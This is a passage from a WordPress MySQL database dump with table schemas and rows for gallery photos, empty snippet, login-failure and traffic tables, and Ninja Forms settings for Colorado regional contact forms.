  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=189 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_gg_photos`
--

LOCK TABLES `wpcl_gg_photos` WRITE;
/*!40000 ALTER TABLE `wpcl_gg_photos` DISABLE KEYS */;
INSERT INTO `wpcl_gg_photos` VALUES (54,0,0,125651,9000,'2019-08-16 22:30:31',0,'','',''),(55,0,0,125652,9000,'2019-08-16 22:30:33',0,'','',''),(56,0,0,125677,9000,'2019-08-16 22:30:34',0,'','',''),(57,0,0,125676,9000,'2019-08-16 22:30:35',0,'','',''),(58,0,0,125675,9000,'2019-08-16 22:30:36',0,'','',''),(59,0,0,125674,9000,'2019-08-16 22:30:37',0,'','',''),(60,0,0,125673,9000,'2019-08-16 22:30:38',0,'','',''),(61,0,0,125672,9000,'2019-08-16 22:30:39',0,'','',''),(62,0,0,125671,9000,'2019-08-16 22:30:41',0,'','',''),(63,0,0,125670,9000,'2019-08-16 22:30:42',0,'','',''),(64,0,0,125669,9000,'2019-08-16 22:30:44',0,'','',''),(65,0,0,125668,9000,'2019-08-16 22:30:45',0,'','',''),(66,0,0,125667,9000,'2019-08-16 22:30:46',0,'','',''),(67,0,0,125666,9000,'2019-08-16 22:30:47',0,'','',''),(68,0,0,125665,9000,'2019-08-16 22:30:48',0,'','',''),(69,0,0,125664,9000,'2019-08-16 22:30:49',0,'','',''),(70,0,0,125663,9000,'2019-08-16 22:30:50',0,'','',''),(71,0,0,125662,9000,'2019-08-16 22:30:51',0,'','',''),(72,0,0,125661,9000,'2019-08-16 22:30:53',0,'','',''),(73,0,0,125660,9000,'2019-08-16 22:30:54',0,'','',''),(74,0,0,125659,9000,'2019-08-16 22:30:55',0,'','',''),(75,0,0,125658,9000,'2019-08-16 22:30:56',0,'','',''),(76,0,0,125657,9000,'2019-08-16 22:30:57',0,'','',''),(77,0,0,125656,9000,'2019-08-16 22:30:58',0,'','',''),(78,0,0,125655,9000,'2019-08-16 22:30:59',0,'','',''),(79,0,0,125654,9000,'2019-08-16 22:31:00',0,'','',''),(80,0,0,125653,9000,'2019-08-16 22:31:01',0,'','',''),(81,0,0,165287,9000,'2019-10-04 22:07:35',0,'','',''),(82,0,0,165286,9000,'2019-10-04 22:07:36',0,'','',''),(83,0,0,165285,9000,'2019-10-04 22:07:37',0,'','',''),(84,0,0,165284,9000,'2019-10-04 22:07:38',0,'','',''),(85,0,0,165283,9000,'2019-10-04 22:07:39',0,'','',''),(86,0,0,165282,9000,'2019-10-04 22:07:40',0,'','',''),(87,0,0,165281,9000,'2019-10-04 22:07:41',0,'','',''),(88,0,0,165280,9000,'2019-10-04 22:07:42',0,'','',''),(89,0,0,165279,9000,'2019-10-04 22:07:44',0,'','',''),(90,0,0,165278,9000,'2019-10-04 22:07:45',0,'','',''),(91,0,0,165277,9000,'2019-10-04 22:07:46',0,'','',''),(92,0,0,165276,9000,'2019-10-04 22:07:47',0,'','',''),(93,0,0,165275,9000,'2019-10-04 22:07:48',0,'','',''),(94,0,0,165274,9000,'2019-10-04 22:07:49',0,'','',''),(95,0,0,165273,9000,'2019-10-04 22:07:51',0,'','',''),(96,0,0,165272,9000,'2019-10-04 22:07:52',0,'','',''),(97,0,0,165271,9000,'2019-10-04 22:07:53',0,'','',''),(98,0,0,165270,9000,'2019-10-04 22:07:54',0,'','',''),(99,0,0,165269,9000,'2019-10-04 22:07:55',0,'','',''),(100,0,0,165268,9000,'2019-10-04 22:07:56',0,'','',''),(101,0,0,165267,9000,'2019-10-04 22:07:58',0,'','',''),(102,0,0,165266,9000,'2019-10-04 22:07:59',0,'','',''),(103,0,0,165265,9000,'2019-10-04 22:08:01',0,'','',''),(104,0,0,165264,9000,'2019-10-04 22:08:02',0,'','',''),(105,0,0,165263,9000,'2019-10-04 22:08:03',0,'','',''),(106,0,0,165262,9000,'2019-10-04 22:08:04',0,'','',''),(107,0,0,165261,9000,'2019-10-04 22:08:06',0,'','',''),(108,0,0,165260,9000,'2019-10-04 22:08:07',0,'','',''),(109,0,0,165259,9000,'2019-10-04 22:08:08',0,'','',''),(110,0,0,165258,9000,'2019-10-04 22:08:09',0,'','',''),(111,0,0,165257,9000,'2019-10-04 22:08:10',0,'','',''),(112,0,0,165256,9000,'2019-10-04 22:08:12',0,'','',''),(113,0,0,165255,9000,'2019-10-04 22:08:13',0,'','',''),(114,0,0,165254,9000,'2019-10-04 22:08:14',0,'','',''),(115,0,0,165253,9000,'2019-10-04 22:08:15',0,'','',''),(116,0,0,165252,9000,'2019-10-04 22:08:16',0,'','',''),(117,0,0,165251,9000,'2019-10-04 22:08:18',0,'','',''),(118,0,0,165250,9000,'2019-10-04 22:08:19',0,'','',''),(119,0,0,165249,9000,'2019-10-04 22:08:20',0,'','',''),(120,0,0,165248,9000,'2019-10-04 22:08:22',0,'','',''),(121,0,0,125677,9000,'2020-01-21 05:48:55',0,'','',''),(122,0,0,125676,9000,'2020-01-21 05:48:58',0,'','',''),(123,0,0,125675,9000,'2020-01-21 05:48:59',0,'','',''),(124,0,0,125674,9000,'2020-01-21 05:49:02',0,'','',''),(125,0,0,125673,9000,'2020-01-21 05:49:04',0,'','',''),(126,0,0,125672,9000,'2020-01-21 05:49:07',0,'','',''),(127,0,0,125671,9000,'2020-01-21 05:49:09',0,'','',''),(128,0,0,125670,9000,'2020-01-21 05:49:10',0,'','',''),(129,0,0,125669,9000,'2020-01-21 05:49:11',0,'','',''),(130,0,0,125668,9000,'2020-01-21 05:49:13',0,'','',''),(131,0,0,125667,9000,'2020-01-21 05:49:15',0,'','',''),(132,0,0,125666,9000,'2020-01-21 05:49:16',0,'','',''),(133,0,0,125665,9000,'2020-01-21 05:49:18',0,'','',''),(134,0,0,125664,9000,'2020-01-21 05:49:19',0,'','',''),(135,0,0,125663,9000,'2020-01-21 05:49:20',0,'','',''),(136,0,0,125662,9000,'2020-01-21 05:49:22',0,'','',''),(137,0,0,125661,9000,'2020-01-21 05:49:23',0,'','',''),(138,0,0,125660,9000,'2020-01-21 05:49:25',0,'','',''),(139,0,0,125659,9000,'2020-01-21 05:49:26',0,'','',''),(140,0,0,125658,9000,'2020-01-21 05:49:27',0,'','',''),(141,0,0,125657,9000,'2020-01-21 05:49:29',0,'','',''),(142,0,0,125656,9000,'2020-01-21 05:49:30',0,'','',''),(143,0,0,125655,9000,'2020-01-21 05:49:32',0,'','',''),(144,0,0,125654,9000,'2020-01-21 05:49:33',0,'','',''),(145,0,0,125653,9000,'2020-01-21 05:49:37',0,'','',''),(146,0,0,125652,9000,'2020-01-21 05:49:39',0,'','',''),(147,0,0,125651,9000,'2020-01-21 05:49:40',0,'','',''),(148,0,0,124763,9000,'2020-01-21 05:49:41',0,'','',''),(149,0,0,165287,9000,'2020-01-21 05:50:36',0,'','',''),(150,0,0,165286,9000,'2020-01-21 05:50:37',0,'','',''),(151,0,0,165285,9000,'2020-01-21 05:50:38',0,'','',''),(152,0,0,165284,9000,'2020-01-21 05:50:40',0,'','',''),(153,0,0,165283,9000,'2020-01-21 05:50:41',0,'','',''),(154,0,0,165282,9000,'2020-01-21 05:50:42',0,'','',''),(155,0,0,165281,9000,'2020-01-21 05:50:44',0,'','',''),(156,0,0,165280,9000,'2020-01-21 05:50:45',0,'','',''),(157,0,0,165279,9000,'2020-01-21 05:50:46',0,'','',''),(158,0,0,165278,9000,'2020-01-21 05:50:47',0,'','',''),(159,0,0,165277,9000,'2020-01-21 05:50:49',0,'','',''),(160,0,0,165276,9000,'2020-01-21 05:50:50',0,'','',''),(161,0,0,165275,9000,'2020-01-21 05:50:52',0,'','',''),(162,0,0,165274,9000,'2020-01-21 05:50:54',0,'','',''),(163,0,0,165273,9000,'2020-01-21 05:50:55',0,'','',''),(164,0,0,165272,9000,'2020-01-21 05:50:57',0,'','',''),(165,0,0,165271,9000,'2020-01-21 05:50:58',0,'','',''),(166,0,0,165270,9000,'2020-01-21 05:51:00',0,'','',''),(167,0,0,165269,9000,'2020-01-21 05:51:02',0,'','',''),(168,0,0,165268,9000,'2020-01-21 05:51:03',0,'','',''),(169,0,0,165267,9000,'2020-01-21 05:51:05',0,'','',''),(170,0,0,165266,9000,'2020-01-21 05:51:06',0,'','',''),(171,0,0,165265,9000,'2020-01-21 05:51:07',0,'','',''),(172,0,0,165264,9000,'2020-01-21 05:51:09',0,'','',''),(173,0,0,165263,9000,'2020-01-21 05:51:10',0,'','',''),(174,0,0,165262,9000,'2020-01-21 05:51:11',0,'','',''),(175,0,0,165261,9000,'2020-01-21 05:51:13',0,'','',''),(176,0,0,165260,9000,'2020-01-21 05:51:15',0,'','',''),(177,0,0,165259,9000,'2020-01-21 05:51:16',0,'','',''),(178,0,0,165258,9000,'2020-01-21 05:51:18',0,'','',''),(179,0,0,165257,9000,'2020-01-21 05:51:19',0,'','',''),(180,0,0,165256,9000,'2020-01-21 05:51:20',0,'','',''),(181,0,0,165255,9000,'2020-01-21 05:51:22',0,'','',''),(182,0,0,165254,9000,'2020-01-21 05:51:23',0,'','',''),(183,0,0,165253,9000,'2020-01-21 05:51:24',0,'','',''),(184,0,0,165252,9000,'2020-01-21 05:51:26',0,'','',''),(185,0,0,165251,9000,'2020-01-21 05:51:27',0,'','',''),(186,0,0,165250,9000,'2020-01-21 05:51:28',0,'','',''),(187,0,0,165249,9000,'2020-01-21 05:51:29',0,'','',''),(188,0,0,165248,9000,'2020-01-21 05:51:31',0,'','','');
/*!40000 ALTER TABLE `wpcl_gg_photos` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_gg_photos` with 135 row(s)
--

--
-- Table structure for table `wpcl_ms_snippets`
--

DROP TABLE IF EXISTS `wpcl_ms_snippets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_ms_snippets` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` tinytext NOT NULL DEFAULT '',
  `description` text NOT NULL DEFAULT '',
  `code` longtext NOT NULL DEFAULT '',
  `tags` longtext NOT NULL DEFAULT '',
  `scope` varchar(15) NOT NULL DEFAULT 'global',
  `priority` smallint(6) NOT NULL DEFAULT 10,
  `active` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_ms_snippets`
--

LOCK TABLES `wpcl_ms_snippets` WRITE;
/*!40000 ALTER TABLE `wpcl_ms_snippets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_ms_snippets` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_ms_snippets` with 0 row(s)
--

--
-- Table structure for table `wpcl_wpc_login_fails`
--

DROP TABLE IF EXISTS `wpcl_wpc_login_fails`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpc_login_fails` (
  `login_attempt_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `login_attempt_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `login_attempt_IP` varchar(100) NOT NULL DEFAULT '',
  `failed_user` varchar(200) NOT NULL DEFAULT '',
  `failed_pass` varchar(200) NOT NULL DEFAULT '',
  `reason` varchar(200) DEFAULT NULL,
  PRIMARY KEY (`login_attempt_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpc_login_fails`
--

LOCK TABLES `wpcl_wpc_login_fails` WRITE;
/*!40000 ALTER TABLE `wpcl_wpc_login_fails` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpc_login_fails` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpc_login_fails` with 0 row(s)
--

--
-- Table structure for table `wpcl_wftrafficrates`
--

DROP TABLE IF EXISTS `wpcl_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wftrafficrates`
--

LOCK TABLES `wpcl_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wpcl_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wftrafficrates` with 0 row(s)
--

--
-- Table structure for table `wpcl_nf3_form_meta`
--

DROP TABLE IF EXISTS `wpcl_nf3_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_form_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2474 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_form_meta`
--

LOCK TABLES `wpcl_nf3_form_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_form_meta` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_form_meta` VALUES (1,1,'key','','key',''),(2,1,'created_at','2019-07-15 13:38:56','created_at','2019-07-15 13:38:56'),(3,1,'default_label_pos','above','default_label_pos','above'),(4,1,'conditions','a:0:{}','conditions','a:0:{}'),(5,1,'objectType','Form Setting','objectType','Form Setting'),(6,1,'editActive','','editActive',''),(7,1,'show_title','1','show_title','1'),(8,1,'clear_complete','1','clear_complete','1'),(9,1,'hide_complete','1','hide_complete','1'),(10,1,'wrapper_class','','wrapper_class',''),(11,1,'element_class','','element_class',''),(12,1,'add_submit','1','add_submit','1'),(13,1,'logged_in','','logged_in',''),(14,1,'not_logged_in_msg','','not_logged_in_msg',''),(15,1,'sub_limit_number','','sub_limit_number',''),(16,1,'sub_limit_msg','','sub_limit_msg',''),(17,1,'calculations','a:0:{}','calculations','a:0:{}'),(18,1,'formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}','formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}'),(19,1,'container_styles_background-color','','container_styles_background-color',''),(20,1,'container_styles_border','','container_styles_border',''),(21,1,'container_styles_border-style','','container_styles_border-style',''),(22,1,'container_styles_border-color','','container_styles_border-color',''),(23,1,'container_styles_color','','container_styles_color',''),(24,1,'container_styles_height','','container_styles_height',''),(25,1,'container_styles_width','','container_styles_width',''),(26,1,'container_styles_font-size','','container_styles_font-size',''),(27,1,'container_styles_margin','','container_styles_margin',''),(28,1,'container_styles_padding','','container_styles_padding',''),(29,1,'container_styles_display','','container_styles_display',''),(30,1,'container_styles_float','','container_styles_float',''),(31,1,'container_styles_show_advanced_css','0','container_styles_show_advanced_css','0'),(32,1,'container_styles_advanced','','container_styles_advanced',''),(33,1,'title_styles_background-color','','title_styles_background-color',''),(34,1,'title_styles_border','','title_styles_border',''),(35,1,'title_styles_border-style','','title_styles_border-style',''),(36,1,'title_styles_border-color','','title_styles_border-color',''),(37,1,'title_styles_color','','title_styles_color',''),(38,1,'title_styles_height','','title_styles_height',''),(39,1,'title_styles_width','','title_styles_width',''),(40,1,'title_styles_font-size','','title_styles_font-size',''),(41,1,'title_styles_margin','','title_styles_margin',''),(42,1,'title_styles_padding','','title_styles_padding',''),(43,1,'title_styles_display','','title_styles_display',''),(44,1,'title_styles_float','','title_styles_float',''),(45,1,'title_styles_show_advanced_css','0','title_styles_show_advanced_css','0'),(46,1,'title_styles_advanced','','title_styles_advanced',''),(47,1,'row_styles_background-color','','row_styles_background-color',''),(48,1,'row_styles_border','','row_styles_border',''),(49,1,'row_styles_border-style','','row_styles_border-style',''),(50,1,'row_styles_border-color','','row_styles_border-color',''),(51,1,'row_styles_color','','row_styles_color',''),(52,1,'row_styles_height','','row_styles_height',''),(53,1,'row_styles_width','','row_styles_width',''),(54,1,'row_styles_font-size','','row_styles_font-size',''),(55,1,'row_styles_margin','','row_styles_margin',''),(56,1,'row_styles_padding','','row_styles_padding',''),(57,1,'row_styles_display','','row_styles_display',''),(58,1,'row_styles_show_advanced_css','0','row_styles_show_advanced_css','0'),(59,1,'row_styles_advanced','','row_styles_advanced',''),(60,1,'row-odd_styles_background-color','','row-odd_styles_background-color',''),(61,1,'row-odd_styles_border','','row-odd_styles_border',''),(62,1,'row-odd_styles_border-style','','row-odd_styles_border-style',''),(63,1,'row-odd_styles_border-color','','row-odd_styles_border-color',''),(64,1,'row-odd_styles_color','','row-odd_styles_color',''),(65,1,'row-odd_styles_height','','row-odd_styles_height',''),(66,1,'row-odd_styles_width','','row-odd_styles_width',''),(67,1,'row-odd_styles_font-size','','row-odd_styles_font-size',''),(68,1,'row-odd_styles_margin','','row-odd_styles_margin',''),(69,1,'row-odd_styles_padding','','row-odd_styles_padding',''),(70,1,'row-odd_styles_display','','row-odd_styles_display',''),(71,1,'row-odd_styles_show_advanced_css','0','row-odd_styles_show_advanced_css','0'),(72,1,'row-odd_styles_advanced','','row-odd_styles_advanced',''),(73,1,'success-msg_styles_background-color','','success-msg_styles_background-color',''),(74,1,'success-msg_styles_border','','success-msg_styles_border',''),(75,1,'success-msg_styles_border-style','','success-msg_styles_border-style',''),(76,1,'success-msg_styles_border-color','','success-msg_styles_border-color',''),(77,1,'success-msg_styles_color','','success-msg_styles_color',''),(78,1,'success-msg_styles_height','','success-msg_styles_height',''),(79,1,'success-msg_styles_width','','success-msg_styles_width',''),(80,1,'success-msg_styles_font-size','','success-msg_styles_font-size',''),(81,1,'success-msg_styles_margin','','success-msg_styles_margin',''),(82,1,'success-msg_styles_padding','','success-msg_styles_padding',''),(83,1,'success-msg_styles_display','','success-msg_styles_display',''),(84,1,'success-msg_styles_show_advanced_css','0','success-msg_styles_show_advanced_css','0'),(85,1,'success-msg_styles_advanced','','success-msg_styles_advanced',''),(86,1,'error_msg_styles_background-color','','error_msg_styles_background-color',''),(87,1,'error_msg_styles_border','','error_msg_styles_border',''),(88,1,'error_msg_styles_border-style','','error_msg_styles_border-style',''),(89,1,'error_msg_styles_border-color','','error_msg_styles_border-color',''),(90,1,'error_msg_styles_color','','error_msg_styles_color',''),(91,1,'error_msg_styles_height','','error_msg_styles_height',''),(92,1,'error_msg_styles_width','','error_msg_styles_width',''),(93,1,'error_msg_styles_font-size','','error_msg_styles_font-size',''),(94,1,'error_msg_styles_margin','','error_msg_styles_margin',''),(95,1,'error_msg_styles_padding','','error_msg_styles_padding',''),(96,1,'error_msg_styles_display','','error_msg_styles_display',''),(97,1,'error_msg_styles_show_advanced_css','0','error_msg_styles_show_advanced_css','0'),(98,1,'error_msg_styles_advanced','','error_msg_styles_advanced',''),(99,2,'objectType','Form Setting','objectType','Form Setting'),(100,2,'editActive','1','editActive','1'),(101,2,'date_updated','2017-07-04 17:38:36','date_updated','2017-07-04 17:38:36'),(102,2,'clear_complete','1','clear_complete','1'),(103,2,'hide_complete','1','hide_complete','1'),(104,2,'show_title','0','show_title','0'),(105,2,'status','','status',''),(106,2,'append_page','','append_page',''),(107,2,'ajax','0','ajax','0'),(108,2,'logged_in','0','logged_in','0'),(109,2,'not_logged_in_msg','','not_logged_in_msg',''),(110,2,'sub_limit_number','','sub_limit_number',''),(111,2,'sub_limit_msg','','sub_limit_msg',''),(112,2,'title',' Loveland Initiators and ESAâs','title',' Loveland Initiators and ESAâs'),(113,2,'conditions','a:0:{}','conditions','a:0:{}'),(114,2,'default_label_pos','above','default_label_pos','above'),(115,2,'wrapper_class','','wrapper_class',''),(116,2,'element_class','','element_class',''),(117,2,'key','','key',''),(118,2,'add_submit','1','add_submit','1'),(119,2,'currency','','currency',''),(120,2,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(121,2,'calculations','a:0:{}','calculations','a:0:{}'),(122,2,'formContentData','a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}','formContentData','a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}'),(147,4,'date_updated','2016-02-19 00:14:49','date_updated','2016-02-19 00:14:49'),(148,4,'clear_complete','1','clear_complete','1'),(149,4,'hide_complete','1','hide_complete','1'),(150,4,'show_title','0','show_title','0'),(151,4,'status','','status',''),(152,4,'append_page','','append_page',''),(153,4,'ajax','0','ajax','0'),(154,4,'logged_in','0','logged_in','0'),(155,4,'not_logged_in_msg','','not_logged_in_msg',''),(156,4,'sub_limit_number','','sub_limit_number',''),(157,4,'sub_limit_msg','','sub_limit_msg',''),(158,4,'last_sub','5','last_sub','5'),(159,4,'title','Add/Update Email or Address','title','Add/Update Email or Address'),(160,4,'_seq_num','39','_seq_num','39'),(161,4,'conditions','a:0:{}','conditions','a:0:{}'),(162,5,'objectType','Form Setting','objectType','Form Setting'),(163,5,'editActive','1','editActive','1'),(164,5,'date_updated','2017-07-04 16:43:23','date_updated','2017-07-04 16:43:23'),(165,5,'clear_complete','1','clear_complete','1'),(166,5,'hide_complete','1','hide_complete','1'),(167,5,'show_title','0','show_title','0'),(168,5,'status','','status',''),(169,5,'append_page','','append_page',''),(170,5,'ajax','0','ajax','0'),(171,5,'logged_in','0','logged_in','0'),(172,5,'not_logged_in_msg','','not_logged_in_msg',''),(173,5,'sub_limit_number','','sub_limit_number',''),(174,5,'sub_limit_msg','','sub_limit_msg',''),(175,5,'last_sub','11','last_sub','11'),(176,5,'title','Alamosa Initiators and ESAâs','title','Alamosa Initiators and ESAâs'),(177,5,'conditions','a:0:{}','conditions','a:0:{}'),(178,5,'default_label_pos','above','default_label_pos','above'),(179,5,'wrapper_class','','wrapper_class',''),(180,5,'element_class','','element_class',''),(181,5,'key','','key',''),(182,5,'add_submit','1','add_submit','1'),(183,5,'currency','','currency',''),(184,5,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(185,5,'calculations','a:0:{}','calculations','a:0:{}'),(186,5,'formContentData','a:11:{i:0;s:7:\"html_80\";i:1;s:10:\"textbox_81\";i:2;s:11:\"lastname_82\";i:3;s:8:\"email_83\";i:4;s:8:\"phone_84\";i:5;s:13:\"listselect_85\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166999137\";i:7;s:11:\"textarea_89\";i:8;s:18:\"html_1663797572453\";i:9;s:9:\"submit_91\";i:10;s:18:\"html_1663797570022\";}','formContentData','a:11:{i:0;s:7:\"html_80\";i:1;s:10:\"textbox_81\";i:2;s:11:\"lastname_82\";i:3;s:8:\"email_83\";i:4;s:8:\"phone_84\";i:5;s:13:\"listselect_85\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166999137\";i:7;s:11:\"textarea_89\";i:8;s:18:\"html_1663797572453\";i:9;s:9:\"submit_91\";i:10;s:18:\"html_1663797570022\";}'),(187,5,'_seq_num','18','_seq_num','18'),(188,6,'objectType','Form Setting','objectType','Form Setting'),(189,6,'editActive','1','editActive','1'),(190,6,'date_updated','2017-07-04 16:58:32','date_updated','2017-07-04 16:58:32'),(191,6,'clear_complete','1','clear_complete','1'),(192,6,'hide_complete','1','hide_complete','1'),(193,6,'show_title','0','show_title','0'),(194,6,'status','','status',''),(195,6,'append_page','','append_page',''),(196,6,'ajax','0','ajax','0'),(197,6,'logged_in','0','logged_in','0'),(198,6,'not_logged_in_msg','','not_logged_in_msg',''),(199,6,'sub_limit_number','','sub_limit_number',''),(200,6,'sub_limit_msg','','sub_limit_msg',''),(201,6,'last_sub','1','last_sub','1'),(202,6,'title','Boulder Area Initiator and ESA\'s','title','Boulder Area Initiator and ESA\'s'),(203,6,'conditions','a:0:{}','conditions','a:0:{}'),(204,6,'default_label_pos','above','default_label_pos','above'),(205,6,'wrapper_class','','wrapper_class',''),(206,6,'element_class','','element_class',''),(207,6,'key','','key',''),(208,6,'add_submit','1','add_submit','1'),(209,6,'currency','','currency',''),(210,6,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(211,6,'calculations','a:0:{}','calculations','a:0:{}'),(212,6,'formContentData','a:10:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613167025126\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797605970\";i:9;s:10:\"submit_104\";}','formContentData','a:10:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613167025126\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797605970\";i:9;s:10:\"submit_104\";}'),(213,6,'_seq_num','7','_seq_num','7'),(241,8,'objectType','Form Setting','objectType','Form Setting'),(242,8,'editActive','','editActive',''),(243,8,'date_updated','2017-07-04 18:10:50','date_updated','2017-07-04 18:10:50'),(244,8,'clear_complete','1','clear_complete','1'),(245,8,'hide_complete','1','hide_complete','1'),(246,8,'show_title','0','show_title','0'),(247,8,'status','','status',''),(248,8,'append_page','','append_page',''),(249,8,'ajax','0','ajax','0'),(250,8,'logged_in','0','logged_in','0'),(251,8,'not_logged_in_msg','','not_logged_in_msg',''),(252,8,'sub_limit_number','','sub_limit_number',''),(253,8,'sub_limit_msg','','sub_limit_msg',''),(254,8,'last_sub','4','last_sub','4'),(255,8,'title','Central Colorado Leadership Communications','title','Central Colorado Leadership Communications'),(256,8,'conditions','a:0:{}','conditions','a:0:{}'),(257,8,'default_label_pos','above','default_label_pos','above'),(258,8,'wrapper_class','','wrapper_class',''),(259,8,'element_class','','element_class',''),(260,8,'key','','key',''),(261,8,'add_submit','1','add_submit','1'),(262,8,'currency','','currency',''),(263,8,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been 